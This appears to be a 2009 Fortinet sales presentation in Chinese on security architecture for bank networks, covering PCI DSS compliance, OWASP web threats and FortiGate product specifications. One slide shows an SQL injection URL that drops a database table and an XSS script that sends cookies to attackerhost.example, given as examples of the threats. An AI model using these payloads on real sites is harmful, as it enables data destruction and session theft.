1July,2009建設高校綠色網絡應用安全架構建設金融網絡應用安全架構2內容安排

Fortinet安全產品系列5銀行應用網絡安全部署2銀行網絡安全區域架構分析3統一安全的行業技術發展方向4

1國際行業安全形勢及PCI規范

6Fortinet公司安全服務3用戶面臨的安全威脅正日益增長3惡意軟件指數級的增長（單位：千）美國國防部報告的惡意網絡行為（單位：千）HackersBreachHeartlandPaymentCreditCardSystem(1/20/2009)“HeartlandPaymentSystems(HPY)disclosedthatintrudershackedintothe

computersitusestoprocess100millionpaymentcardtransactionspermonthfor175,000merchants…”ElectricityGridinU.S.PenetratedbySpies(4/8/2009)“CyberspieshavepenetratedtheU.S.electricalgridandleftbehindsoftwareprogramsthatcouldbeusedtodisruptthesystem,accordingtocurrentandformernational-securityofficials...”U.S.SouthKoreaInvestigatePossibleNorthKoreanCyberAttack(7/8/2009)“Aseriesofcoordinatedattacksongovernmentandfinancialwebsitesstarted

aroundthesametimeNorthKoreatestednewmissilesandfacedfreshsanctions…”混合型攻擊現在成為主流檢測層次需要提升

性能壓力增強攻擊的動機從吸引注意力轉向經濟利益網絡安全的重要性越來越高4用戶的商業安全需求日益提高4企業數據中心的網絡吞吐量10MB100MB1GBMulti-GB10GB企業的信息安全需要遵循更多的一致性要求一致性要求既來自于政府頒布的法律法規，也會來自于行業規定或商業伙伴的要求IT預算收縮安全開銷增加網絡需求正不斷加速安全需求也需要與之匹配SOX404FISMAHIPAA2009至2010年IT服務花銷變化EUDataProtectionDirective5國際化的行業數據漏洞和破壞“AtlantisResort

報告數據被偷影響了

55,000

客戶”“Marriott丟失了存有206,000個客戶個人信息的備份磁帶”“CardSystemsSolutions公司4000萬張信用卡被破解，其中包括1390萬張萬事達信用卡和2200萬張Visa信用卡“GuidanceSoftware報告有漏洞”“WellsFargoBank報告被偷的計算機上包含私人數據”“LexisNexis被黑的數據庫包含

310,000

客戶信息”“BankofAmericalooses丟失的備份磁帶內存有1200萬聯邦數據”數據安全漏洞還在上升...5000萬客戶受到影響!!應用系統漏洞都已經防護了嗎?未報道的那些漏洞會怎么樣呢?這些數據為什么會受到攻擊?6FortinetConfidential

在過去3年中，數據竊取者增加了650%—CSI/FBI51%以上的破壞行為并未被告知公司中的每一名員工。

—CIO平均每起內部攻擊導致的經濟損失為270萬美元。

—CSI/FBI調查報告20%以上的金融公司都遭受過數據破壞行為。

—EvansDataCorp金融行業信息安全威脅的現狀78%以上攻擊者都是授權用戶：如公司員工、設備或第三方服務提供商等。-CERT/SecretService7完善的安全防御覆蓋能力（數據安全，傳輸安全，內容安全等）動態安全的服務能力（自動適應性更新）

行業IT安全法規的遵從（PCI，CISP，SOX,FSA等）減少IT安全風險，降低IT管理資源穩定的性能和高效運營能力簡單的部署方式和靈活的網絡適應性完整的產品部署解決方案和未來平滑升級支持國際金融行業IT安全建設重點動態威脅安全防御能力良好的投資回報性能復合型安全效能回報

降低TCO總體投入和維護成本保護綠色能源遵從綠色能源消耗優化物理空間節約業務穩定性保持8國際金融行業IT安全規范PCI成立于2004年12月，由5家最頂尖的信用卡行業組織發起發布了PCIDSS，使各企業自有的安全策略保持一致標準制定是為了確保在企業存儲、處理、傳輸持卡人數據時，應滿足最低級別的安全風險金融處理信用卡信息時，必須遵從新的PCI標準2008年10月發布1.2版本建立從網絡層，內容層到應用層的體系安全結構強調防范常見的編碼漏洞，特別是OWASP（開放的web業務服務安全組織）中定義的漏洞編碼檢查或確保在公開的Web應用前部署Web應用防火墻，以檢測并阻止基于Web的攻擊。

增強合規企業的信譽，降低安全風險，是現代金融企業安全標準Fortinet是PCI安全標準委員會的成員之一(2009年10月6日)99CISP/PCI安全規范遵從方案PCI數據安全標準描述Fortinet解決方案構建并維護安全網絡安裝并維護防火墻配置以保護持卡人數據不使用供應商缺省設置的系統密碼和其他安全參數FortiGate集成的防火墻功能FortiDB漏洞評估管理和審計保護持卡人數據保護存儲的持卡人數據加密通過公共網絡傳輸的持卡人數據和敏感性信息FortiGate集成的VPN功能FortiWebweb應用安全網關維護漏洞管理計劃使用反病毒軟件并定期更新開發、維護安全系統和應用程序FortiGate集成病毒網關FortiClient桌面反病毒FortiDB數據庫漏洞管理和審計Fortinet具有成本效益的金融機構類產品幫助金融機構匹配和維持CISP/PCI法規1010PCI數據安全標準描述Fortinet解決方案實施可靠的訪問控制措施只有具備業務需求的人才能訪問持卡人數據為每位擁有計算機訪問權限的用戶分配唯一的ID嚴格限制對持卡人數據的物理訪問FortiGate

安全用戶認證授權FortiDB數據庫權限審計定期監控和測試網絡跟蹤和監控訪問網絡資源和持卡人數據的所有操作定期測試安全系統和流程FortiAnalyzer

網絡日志報告審計，FortiDB漏洞評估掃描和審計維護信息安全策略維護針對信息安全的策略FortiManager

集中管理設備Fortinet具有成本效益的金融機構類產品幫助金融機構匹配和維持CISP/PCI法規CISP/PCI安全規范遵從方案11FortinetConfidental保密文件11現代金融系統三維安全架構特點VPN數據加密VPN提供了數據安全加密和傳輸通道

網絡防火墻防火墻提供了網絡層區域威脅防御體系

防病毒網關/DLP

檢測/阻止病毒/木馬和惡意代碼安全信息泄漏保護IPS入侵防御IDC網絡服務器系統監控網絡行為和系統安全警告

Web前置安全檢測Web接口應用的滲透性不規范訪問安全

數據庫安全業務后臺數據安全評估和訪問安全審計業務應用安全網絡連接安全系統內容安全12網絡應用的變化Page12|

Collaboration/Media

防火墻只基于網絡和端口的檢測的脆弱性問題…新型應用的發展逐漸多樣化Ports≠ApplicationsIPAddresses

≠

UsersProblem:ITCan’tSafelyEnableInternetApplicationsSaaSPersonal安全威脅從網絡層擴展到應用層13從戰略發展角度來考慮IT安全建設問題？面向未來考慮您的安全基礎構架先于威脅的變化立體安全威脅的自動化更新防御建立統一鞏固的安全體系，而非逐點式部署降低復雜性增強保護能力減少風險降低資本性支出和運營成本從系統結構角度部署應對安全威脅到2010年為止，只有10%

的安全威脅會被單一功能安全產品發現，而在2005年這個數字還是80%。

Source:Gartner““*Gartner:CostCuttingWhileImprovingITSecurity,March20,200814安全的復雜技術考慮防火墻安全管理安全監控系統攻擊IPS病毒/蠕蟲數據泄漏網站過濾數據加密傳輸郵件安全應用控制三層路由廣域傳輸優化15Fortinet提供戰略性安全服務綜合安全解決方案集成的戰略安全結構統一的安全威脅管理更低的TCO降低復雜性和管理難度簡化實施和配置實時安全防御

24×7全球安全更新集中云式服務體系靈活部署

適應客戶的時間表和預算基于客戶的特性服務16第三方系統內部數據交換區EAI,UDI,CCIWeb前置機業務應用系統數據庫系統業務管理數據庫應用平臺集中管理和審計安全分析DNSSMTPFTPProxy集中管理區內網應用和數據區OCRM,BDBWeb前置機業務應用服務器數據庫系統網銀服務器系統公共E-Banking系統OA辦公區核心區互聯網區銀行業務局域網區域安全區結構internet17OA辦公區網管區域內部業務區電子銀行業務區企業客戶寬帶家庭用戶惡意訪問移動用戶InternetIntranet銀行業務廣域網區域安全區結構18內部用戶訪問外網的策略控制問題內部用戶安全區域間的訪問隔離需要內部用戶訪問internet的病毒/色情網頁問題內部用戶多線程應用程序的帶寬耗盡問題平衡單用戶的流量均衡問題內部用戶上網的安全審計問題用戶主機的僵尸網絡感染問題用戶主機的非主動性垃圾流量會話攻擊問題基于用戶帳號的授權策略問題病毒/蠕蟲防火墻安全監控

OA辦公網絡的威脅分析Web過濾郵件過濾混合型威脅及新應用帶來的問題總部惡意網頁蠕蟲病毒間諜軟件

P2P、IM應用垃圾郵件網頁欺騙木馬軟件……DMZ服務器區internet20OA辦公網安全部署internetICSA國際計算機組織認證防病毒網關22多協議檢測方式企業網絡資源網頁/郵件/文件傳誦/聊天公共網絡資源互連網

01010101010101010010111011高性能的芯片加速防病毒引擎FortiASIC-CP

(內容處理器)特征匹配防病毒IPS內容過濾加密解密VPN協商密鑰維護FortiASIC-NP

(網絡處理器)高速包轉發線速防火墻IPSecVPNNAT防DoS攻擊流量整形Source: FortiGuardPrevalenceReport, 30daysTop10MalwareinCanadathroughApril21,2007全球部署的安全監控制體系VB100病毒安全掃描認證26外聯業務的對象策略控制問題外聯業務的安全傳輸問題外聯流量的系統層威脅問題外聯流量的惡意垃圾擁塞問題外聯業務的數據流傳輸優化問題外聯業務的虛擬化通道隔離業務流量中的蠕蟲/木馬入侵式威脅業務流量監控系統攻擊IPS病毒/蠕蟲防火墻安全監控外聯業務網絡的威脅分析傳輸優化數據加密27外聯業務虛擬安全隧道部署Intranet分支銀行分支銀行營業所營業所業務虛擬安全隧道接入28網銀業務的安全分析Web應用是業務的主要平臺49%的Web應用包含高風險級別的漏洞，很容易被自動工具探測攻擊80%-96%的Web應用包含有易被黑客攻擊的漏洞99%的Web應用不合乎PCIDSS規范現有的網絡層檢測技術不能防范大多數常見的漏洞攻擊跨站腳本

SQL注入信息泄漏HTTP回應截斷攻擊的商業影響：減少收入–每丟失一條記錄損失$300不合規的處罰損害企業聲譽基于web交互界面入侵后臺數據庫系統是目前主流的威脅方式國際行業專業組織OWASP/Webappsec專注于web應用安全的分析29Web應用安全威脅分析最流行的威脅類型最常見的應用弱點(/projects/statistics/)

Slide293080端口HTTP請求http://XX.XX.XX.XXX/web/n2/productview.asp?id=97;drop%20table%20Card_kevin交換機防火墻Web服務器DB數據庫Select*fromproductwhereid=97Droptablecard_kevin命令已執行成功<SCRIPT>Document.location=‘http://attackerhost.example/cg-bin/

getcookie.cgi?’+document.cookie</SCRIPT>跨站腳本/SQL注入式攻擊Intranet31OWASP開放web應用服務安全組織漏洞描述A1-跨站腳本CrossSiteScripting(XSS) 當應用程序提取用戶提供的數據并發送到Web瀏覽器，數據內容沒有先經過驗證或編碼時，可能出現的XSS漏洞。XSS允許攻擊者在受害者的瀏覽器上執行腳本，腳本可能會劫持用戶會話、破壞Web站點或引入蠕蟲等。A2–注入攻擊InjectionFlaws注入漏洞，特別是SQL注入，通過在Web應用程序內。當用戶提供的數據作為命令或查詢的一部分被發送到解釋器時，可能出現注入漏洞。攻擊者的惡意數據欺騙翻譯器執行非用戶本意的命令或改變數據。A3–惡意文件執行MaliciousFileExecution遠程文件包含(RFI)代碼缺陷允許攻擊者包含惡意代碼和數據，導致破壞性的攻擊，如全部服務器被攻陷。惡意文件執行攻擊會影響PHP、XML以及任意從用戶接收文件名或文件的架構。A4–不安全的直接對象引用InsecureDirectObjectReference當開發人員把一個引用暴露給內部執行對象時，如一個文件、目錄、數據庫記錄或鍵值、URL或格式參數，可能發生直接對象引用。攻擊者可以操縱這些引用訪問其它未經認證的對象。A5–跨站請求偽造CrossSiteRequestForgery(CSRF)CSRF攻擊強制登錄用戶的瀏覽器發送經過預先認證的請求到一個有漏洞的Web應用程序，接著強制受害者的瀏覽器執行一個對攻擊者有利的惡意行為。CSRF能和它所攻擊的Web應用程序一樣有效。A6–信息泄漏及不正確的錯誤操作InformationLeakageandImproperErrorHandling應用程序可能通過各種應用程序問題非用戶本意的泄漏配置、內部結構或隱私等信息。攻擊者利用這個弱點偷竊敏感數據或傳入更多嚴重的攻擊。A7–失效認證及會話管理BrokenAuthenticationandSessionManagement信任賬戶及會話令牌通過沒有被完全的保護。攻擊者使用密碼、密鑰或認證令牌偽裝其它用戶的身份。A8–不安全的密碼存儲InsecureCryptographicStorageWeb應用程序很少能適當的使用密碼功能來保護數據和credential。攻擊者通過缺乏有效保護的數據來竊取身份及其它犯罪行為，如信用卡欺詐。A9–不安全的通信InsecureCommunications敏感數據需要被保護，而應用程序經常沒有對網絡流量進行加密。A10–限制URL訪問失效FailuretoRestrictURLAccess通常，應用程序只能通過對非認證用戶鏈拉或URL的顯示來保護敏感功能。攻擊者能利用這個弱點，通過直接訪問URL來訪問并執行未授權的操作。32后臺數據庫的安全與規范目標數據庫與利潤相關的特定目標數據大量的經由互聯網和應用程序的訪問整合度越大，體現出的價值越大數據庫數據遭到破壞而導致的損失接近每條$200*檢測/擴大，通告，商業損失2005-2007，有將近1億5000萬的數據庫數據記錄丟失來自于內部人員的安全威脅只保障邊界網絡安全是不夠的高權限用戶引起的安全威脅占78%*，職責分離*來源:Ponemon研究所33內部用戶合法權限濫用權限盜用越權濫用權限分配不當臨時帳號未及時清理備份數據缺乏保護離職員工的后門合作伙伴合法權限濫用權限盜用越權濫用后門程序DB2/SQL/Oracle/Sybase數據庫軟件數據庫平臺漏洞通訊協議漏洞弱鑒權機制日志缺失或不完整

4W：-是誰，做了什么-什么時候，在哪里跟蹤：-登錄-數據/文件訪問-數據/文件變化-模式變化-日志竄改-人為錯誤-可疑的活動-自定義事件數據庫安全審計規范34網銀服務區安全部署外部用戶網銀服務器數據庫/LDAP服務器Web門戶系統Web安全防護設備InternetIntranet數據庫監控設備Web注入攻擊數據庫攻擊數據庫攻擊Web應用安全檢測XML內容語言檢測SSL/XML加速Web負載均衡專業硬件芯片技術多種應用簽名技術漏洞掃描監控與審計支持多種數據庫安全補救措施建議跟蹤軌跡預配置報告類型Web安全數據庫安全Interet35圖形報告攻擊審計日志36虛擬化業務服務器群安全分析固定對象和應用訪問的策略控制問題訪問會話的攻擊性泛濫壓力拒絕服務的資源性攻擊壓力系統層弱點探測攻擊的問題基于訪問者的流量控制問題畸形數據包重組的協議層壓力業務的長連接保持問題虛擬化安全策略配置問題蠕蟲/木馬入侵式威脅系統攻擊IPS病毒/蠕蟲防火墻安全監控37虛擬化業務服務器集群虛擬業務服務區一防火墻虛擬策略工作模式安全配置:AV安全配置:AS安全配置:WCF安全配置;IPS路由業務安全策略組安全配置:TS安全審計策略組業務服務器集群區安全部署核心交換機安全網關安全網關核心交換機InternetIntranet38統一安全管理監控系統

分支銀行

分支銀行

移動用戶

IntranetInternetOA辦公區網管區域內部業務區電子銀行業務區安全掃描管理審計39安全集中統計報表超過300個報表模版報表設置向導報表完全可定制報表示例事件/攻擊基于:

設備

來源

類別

威脅名稱

協議郵件使用率Web使用率帶寬使用率協議使用率

40安全集中監控中心41Fortinet公司概況全球領先的專業整合安全技術提供商專業網絡安全廠商2000年成立1200+名員工/超過500+工程發展最快的專業安全公司全球化的銷售服務體系(美國，歐洲，亞洲)華爾街業績增長最好的公司之一FTNT(IPO)權威的安全認證6項ICSA(計算機安全實驗室）認證最高級政府安全認證(FIPS-2,

CommonCriteriaEAL4+)100+安全行業認證ISO9001認證美國病毒專業評測試VB100認證

歐洲專業IPS安全評測NSS認證Frost&Sullivan/IDC全球最大的整合性安全廠家42為全球運營商提供增值安全服務43金融行業客戶4444安全市場分額報告IDCQuarterlyApplianceTracker,June2009(basedonrevenues)Gartner,Inc.,“1H09MultiFunctionFirewallMagicQuadrant”byG.YoungandA.Hils,JuneX,2009.2007Frost&SullivanAwardfor“MarketLeadershipinUTM”and“GlobalCompetitiveStrategyLeadershipoftheYear"SourceIDC報告整合性安全市場

Gartner報告多功能防火墻市場Frost&Sullivan報告整合性安全市場45全球整合性安全市場的發展趨勢45

2008 2009 2010 2011 2012 2013Firewall&VPNUTM(-0.5%)CAGR$2.2$2.1$inbillions13.8%CAGR$1.7$3.2Source:IDC“WorldwideNetworkSecurity2008-2012Forecastand2007VendorShares:Transitions–AppliancesAreMoreThanMeetstheEye”46國內UTM整合性安全市場的發展47Fortinet統一網絡安全解決方案

應用層安全FortiGate七層UTM安全網關安全云服務FortiGuard實時安全云服務網絡FortiMail郵件交付安全FortiWebWeb服務安全主機訪問安全FortiClient主機安全FortiScan資產安全管理FortiDB數據安全審計

邊界網關安全數據庫安全FortiManager集中安全管理FortiAnalyzer集中安全審計統一安全管理48旗艦產品：FortiGate安全網關系列平臺遠程分支桌面級中低端產品線中高端產品線高端產品線FG5000FG30B-80CMFG110C-620BFG5000

FG1240B-3810A反垃圾郵件應用控制防火墻流量控制VPN防病毒IPSWeb過濾SSL加速DLPWAN優化無線支持NAC終端控制49技術特點：分布式安全到集中式管理的演變49Fortinet解決方案傳統分布式安全設計集中式的部署和管理，專用硬件設計結構，一站式安全防御技術TCO成本投入低，安全效能高易于部署和維護，符合綠色IT建設規范安全產品分類過多，管理繁瑣

安全防御效果差，安全問題難于定位總體投資成本過高產品部署和維護對當前網絡影響明顯50

技術特點：為IT網絡提供一站式安全防御50“危險的”視頻鏈接：重定向至惡意網站Web過濾阻擋對惡意網站的訪問網絡防病毒阻止病毒下載入侵防御阻止蠕蟲的傳播FIREWALL

主機感染后外部散播在系統中不斷復制自身，并試圖擴散WEBFILTERINGANTIVIRUS“惡意”文件滲透：下載惡意文件INTRUSIONPROTECTION

PORT80一站攔截多樣化安全威脅應用層防火墻安全過濾不同應用51

產品硬件結構特色：NP+ASIC52業界UTM安全網關的功能比較52PartnerSuppliedInternallyDevelopedNotavailable53業界UTM安全網關的業界認證比較53SomeproductsarecertifiedPassedCertificationnotconducted54FortiGateUTM安全網關功能概述防火墻/VPN策略控制模塊集中安全策略管理/日志報表審計平臺FortiManager/FortiAnalyzer病毒/垃圾郵件/攻擊庫/web庫升級中心DOS/IPS系統攻擊保護模塊病毒/間諜軟件/蠕蟲安全模塊垃圾郵件保護模塊IM/P2P應用控制模塊網頁過濾安全

模塊

廣域網加速模塊DLP數據弱點保護55多種語言的web管理設計符合IT管理規范5556安全模塊:策略配置企業網絡資源公共網絡資源公共網絡個體互連網57認證模塊:靈活的用戶認證ClientSTOP!用戶訪問服務器資源時，先進行認證，輸入正確的用戶名密碼才可以繼續訪問管理員進行服務器管理員工訪問辦公系統合作伙伴訪問相應資源對不同用戶設置不同的訪問權限支持認證方式本地、Radius、LDAP、SecurID、WindowsAD、PKI證書58安全模塊:病毒防御應用企業網絡資源網頁/郵件/文件傳誦/聊天公共網絡資源互連網高性能的ASIC芯片硬件加速防病毒引擎FortiASIC-CP

(內容處理器)特征匹配防病毒IPS內容過濾加密解密VPN協商密鑰維護FortiASIC-NP

(網絡處理器)高速包轉發線速防火墻IPSecVPNNAT防DoS攻擊流量整形支持多種網絡協議的病毒過濾HTTP、FTPSMTP、POP3、IMAPIM、NNTP、CIFS支持協議使用非標準端口可對SSL加密流量進行病毒過濾攔截客戶機和服務器之間的通信攔截SSL握手時傳輸的合法密鑰，并進行替換。以客戶機身份與服務器通信以服務器身份與客戶機通信支持HTTPS、SMTPS、POP3S、IMAPS病毒檢測方式基于病毒特征目前能檢測的病毒種類為100萬種以上支持多級病毒庫支持流掃描方式完整覆蓋Wildlist病毒庫每天4次更新病毒庫宏病毒檢測基于病毒行為啟發式掃描壓縮文件掃描支持多種壓縮格式100層壓縮性能與安全的平衡可根據安全級別和性能需求，選擇4種不同級別的病毒庫。權威的防病毒認證ICSA防病毒認證VB100防病毒認證FortiGuard更新服務FortiGuard全球分布式服務器-自動地實現病毒庫升級，可以在10分鐘內到達所有的FortiGate設備-自動、手動、推送式更新-支持在線及離線方式更新-每天4次更新病毒庫本土化服務（北京研發中心，200+工程師）FortiGuard中心

網站和郵件公告點業界領先的病毒庫更新速度文件大小過濾超大文件過濾可選擇處理方式–通過或阻斷文件類型過濾文件名*.exe等文件類型可執行文件等（可防止修改文件擴展名逃避檢查）間諜軟件/惡意軟件過濾病毒攔截提示報警蠕蟲病毒防御-IPS病毒進入內網后往往不再以文件形式通過Internet應用協議傳播可通過IPS方式阻擋蠕蟲病毒的傳播防病毒與IPS的界限越來越模糊蠕蟲病毒防御–會話監視蠕蟲病毒防御–會話排名蠕蟲病毒防御-會話限制會話限制TCPUDPICMP防御蠕蟲病毒產生的DoS病毒傳播媒介防御-惡意網頁及垃圾郵件降低惡意網頁和垃圾郵件傳播病毒的風險FortiGuard分類過濾76類，5000多萬個網站實時更新數據庫URL過濾黑白名單Email地址及IP地址過濾關鍵字過濾支持多種語言腳本過濾ActiveXJavaAppletCookies隔離病毒及入侵者隔離IP地址隔離IP組合隔離源接口定時自動釋放手工釋放77安全模塊:IPS/NAC隔離攻擊者支持DOS攻擊防御和會話控制IPS特征庫支持3000攻擊特征,24X7升級服務自動隔離攻擊者源地址、源及目的地址、來源接口防止之后可能的持續攻擊徹底阻斷，而非僅僅檢測到的端口可以設置隔離時間互連網公共網絡資源公共網絡個體企業網絡資源

01010101010101010010111011

0101010101010101001011101101010101010101010101010101010101078安全模塊:網頁內容過濾FortiGuardweb過濾庫；82個類別控制；超過4000萬個URL；實時數據庫更新79安全模塊:網頁的過濾應用網絡訪問的內容控制支持WEB內容關鍵字過濾屏蔽具有政治或敏感的網頁內容BBS論壇內容控制

互連網公共網絡資源公共網絡個體企業網絡資源網頁/BBS論壇80安全模塊:垃圾郵件防御應用互連網公共郵件資源公共網絡個體企業網絡資源郵件傳輸81安全模塊:

VPN數據安全應用分支企業間互連IPSecVPNGRE通道移動用戶訪問IPSecSSLPPTPL2TP

分支企業

互連網分支企業中心企業互連網加密通道加密通道分支/中心企業82SSLVPN應用ClientSTOP!用戶訪問服務器資源時，客戶端到網關的數據將被加密傳輸，然后進行認證，輸入正確的用戶名密碼才可以繼續訪問管理員進行服務器管理員工訪問辦公系統合作伙伴訪問相應資源對不同用戶設置不同的訪問權限支持SSL加/解密加速支持認證方式本地、Radius、LDAP、x.509數字證書認證、WindowsADSSL加密83SSLVPN登錄界面定制歡迎語界面風格組件選擇功能選擇終端檢測虛擬桌面84廣域網傳輸優化應用Internet/WANHTTPCIFSHTTP/CIFS數據請求本地存儲文件副本HTTPCIFSH100001111H2DictionaryH1=01010101H2=11110000DictionaryH1=01010101H2=11110000WAN優化的目的：通過減少跨廣域網應用的通信及數據傳輸的數量，提高網絡性能增進應用的性能,提高工作效率改善帶寬的效率,支持更多的用戶和應用分支企業資源互訪的重要特性85Web網際緩存應用WebServerClientHTTPWCCPHTTPWeb緩存技術可以有效地降低Internet網絡流量節約昂貴的廣域網鏈路費用提高用戶訪問速度支持WCCP協議和外部緩沖設備

86安全模塊:應用控制互連網企業網絡資源IM聊天P2P傳輸公共網絡資源87FortiGateUTM安全網關系列88FortiGate50B-620B中低端產品系列AV=httpthroughput產品型號防火墻VPN策略數并發會話新建會話VPN通道FG50B50M45M50025,000200020FG60C1Gbps70M500080,0003000500FG-80C350M80M2,000100,0005000200FG-110C500M/1G100M4,000600,000150001,500FG-310B8G/12G6G/9G8,0001,000,000250003,000FG-620B20G/24G12G/15G8,0001,000,0002800020,000FortiGate-50B–FortiGate-110C89FortiGate1240B-2950B中高端產品系列Performanceresultsdisplayedasbase/fullAMCexpandedusingUDPlargepacketsizesAV=httpapplicationthroughput型號防火墻會話VPN新建會話策略數

通道FG-1240B40Gbps2000,00024G100000100,00020,000FG-3040B40Gbps4000,00016G100000100,00064,000FG-3950B120Gbps10,000,00048G175000100,00064,00090支持各種Internet接入方式未來的無線網絡區域經理移動PC信用卡

Web訂購自助機無線的銷售點

3G91FortiGate-100系列FortiGate-110C基于FortiASICCP的安全加速2個10/100/1000WAN接口8個10/100內置交換接口1個控制接口2個USB接口1U高度桌面式設備配有19”機架安裝工具性能500Mbps防火墻100MbpsIPSecVPN65Mbps防病毒200MbpsIPSFortiGate-111C內置64GSSD硬盤（支持WAN優化）92FortiGate-200BFortiGate-200B基于FortiASICCP/NP的安全加速4x標準10/100/1000端口4x加速10/100/1000端口8x標準10/100端口1xFSM存儲插槽(標配64GSSD)1個控制接口2個USB接口1U高度性能防火墻：4GbpsIPSecVPN：3Gbps病毒檢測：100Mbps新建會話：20K并發會話：800K93FortiGate-310BFirewall性能比較Notice:防火墻性能是基于平均包大小512字節情況下測試的結果

很多廠家在發布其產品的性能指標是都不透露測試時的包大小。94FortiGate-310B產品對比*AV性能測試基于數據流技術,不能緩沖和還原文件FortinetJuniperJuniperCiscoCiscoSonicWallFortiGate-310BSRX-650SSG-550MASA5520

w/Anti-XASA5540NSA5000性能

防火墻吞吐量–平均包大小(512byte)(wAMC)

8Gbps

(12Gbps+AMC)7Gbps1Gbps450Mbps650Mbps1.8Gbps防火墻吞吐量–小包(64byte)(+AMC模塊)

8Gbps

(12Gbps)460Mbps300M163M256MUnknownVPN吞吐量-3DES

(+AMC模塊)

6Gbps

(9Gbps)1.5Gbps300Mbps225Mbps325Mbps1.1GbpsIPS吞吐量

800Mbps900MbpsUnknown225-375Mbps(AIP-SSM-10/20)450Mbps(AIP-SSM-20)

500MbpsIPSecVPN通道數3,0001000（接口模式300）75050002,500并發會話數1,000,000500,000128,000280,000400,000600,000每秒新建會話30,0003,50001500012,00025,0008,500策略8,000

4000UnknownUnknownUnknown硬件配置基本10/100/1000端口1044446模塊插槽166個PIM1N/AN/A產品型號95FortiGate-300系列FortiGate-310B8×1000M電口（小包線速）2×1000M電口（非小包線速）1×單寬AMC插槽2×USB支持RPS冗余電源吞吐量8-12Gbps防火墻（小包）6-9GbpsIPSecVPN（小包）160Mbps防病毒800MbpsIPSAMC擴展模塊FortiGate-310B-DC直流電源版本FortiGate-311B2×FSM擴展槽內置64GSSD硬盤內置冗余電源96FortiGate-620B硬件16個FortiASIC網絡處理器(NP)加速接口4個非NP加速銅口1個單寬AMC插槽2個USB接口支持RPS冗余電源性能16-20Gbps防火墻（小包）12-15GbpsIPSec（小包）250Mbps防病毒1GbpsIPS97FortiGate-620B防火墻性能比較FortiGate-110C防火墻性能是基于平均512字節數據包得出許多競爭對手對公布的性能指標沒有數據包字節數的數據.98FortiGate-620B產品比較*防病毒性能基于流防病毒掃描Fortinet

FortiGate-620BJuniper

SSG-SRX650ISG2000Cisco

ASA5550

w/Anti-XCheckPoint

UTM-13070性能

防火墻吞吐量-平均包長(512byte)(配置AMC)

16Gbps

(20Gbps)7Gbps4Gbps1.2Gbps4.5Gbps防火墻吞吐量–小包長(64byte)(配置AMC)

16Gbps

(20Gbps)460Mbps2Gbps沒有公布沒有公布IPSecVPN吞吐量-(配置AMC)

12Gbps

(15Gbps)1.5Gbps2Gbps425Mbps1.1GbpsIPS吞吐量1Gbps900MbpsN/A225-325Mbps沒有公布專用IPSecVPN通道數20,00010,0005,000沒有公布并發會話1000,000500,000100,0000650,0001,100,000新建會話每秒40,0003,500023,00036,000沒有公布策略數100,000

30000沒有公布沒有公布硬件配置

固定10/100/1000Port2040-8810模塊插槽可擴展4個1G光口60-16N/AN/A99FortiGate-1240B14x加速10/100/1000端口24x加速SFP端口2x標準10/100/1000端口1x單寬AMC插槽6xFSM存儲插槽(單獨訂購FSM-06464GSSD硬盤)1xUSB1xconsoleport防火墻-40GbpsIPSECVPN-24Gbps病毒檢測-500Mbps新建會話

-

15萬

并發會話-

200萬最大VDOM:25支持軟件RAID0/1100FortiGate-1240B性能比較項目FG1240BSRX3400NS5200ASA5580-2010/100/1000安全接口

(銅)28N/A2個，

一個ASA5580-4GE-CU可以增加4個接口1Gb安全接口(光纖/銅纜)384+模塊擴展0-8一個ASA5580-4GE-FI可以增加4GESRLC10Gb安全接口(光纖)N/A0-20-20-12虛擬防火墻25N/A0-5002/50硬盤/CompactFlash可選384GSSD硬盤N/A128/512MN/A并發會話2M1M1M1M新建會話/秒100K80K-175K22,00090,000防火墻吞吐量40Gbps10-20Gbps4-10Gbps5GbpsIPS性能4Gbps6Gbps未公布不支持VPN168-位

3DES吞吐量24Gbps6G4-5Gbps1GbpsSSLVPNPeers

15000不支持不支持10,000IPSecVPN通道數64,00010,00025,00010,000策略數100,00040,00040,000N/A

FortiGate-3040B101FortiGate-3040B(前面板)FortiGate-3040B(后面板)接口規范線速10-GbESFP+接口8個線速

1-GbESFP接口10個10/100/1000管理接口2個10G光收發器2SRSFP+本地64G存儲模塊1個（可擴展到4個）

性能規范

最大網絡層延遲8.5us防火墻性能40Gbps（64-1518字節）并發會話數500萬新建會話數10萬

IPSECAES性能16Gbps策略數10萬FortiGate3950B

102FortiGate-3950BFMC-XD2萬兆接口模塊FMC-XG2IPS加速模塊接口規范線速10-GbESFP+接口2個（可擴展到12個）線速

1-GbESFP接口4個（可擴展到100個）10/100/1000管理接口2個10G光收發器2SRSFP+性能規范

最大網絡層延遲8.5us防火墻性能120Gbps（64-1518字節）并發會話數1000萬新建會話數15萬

IPSECAES性能48Gbps策略數10萬電源雙交流電源功耗507WFMC-C2020x10/100/1000M接口卡FMC-F2020x1GSFP接口卡1033040B競爭比較FortiGate3040BCiscoASA5580-40CheckPointPower-111085JuniperSRX3600CiscoASA5585-X-SSP60防火墻吞吐40Gbps20Gbps25Gbps30Gbps35Gbps并發會話4M2M1.2M2.25M2M每秒新建會話100K150KN/A175k350kIPSec性能16Gbps1Gbps4.5Gbps10Gbps5GbpsIPS性能5GbpsUDP1.6GbpsHTTPNo15Gbps10Gbps10G病毒掃描1.2GbpsNoN/ANoNotSupportedWAN優化FSM256G存儲NoNoNoNotSupported虛擬域YesUpto50N/AN/A50接口配置固定8x10GigSFP+,10x1GSFP接口2x10/100/1000M管理口，6個接口槽（可配4x1G,2x10G接口卡)

18x10/100/1000M,4x10G8x10/100/1000M接口，4個SFP1G,6個IOC接口槽（可配2×10G，16x1G接口卡）

12x10/100/1000M,8x10GigabitSFP+

103104集成交換矩陣ISF特點獨特可擴展的數據包轉發和安全處理結構利用網絡加速模塊FortiASIC-NP4和IPS加速模塊–SP2實現數據安全處理FMC安全處理卡通過ISF內部交換矩陣對任意接口間的通信進行加速全網狀的任意接口通信都可以通過ISF連接到FMC進行數據加速

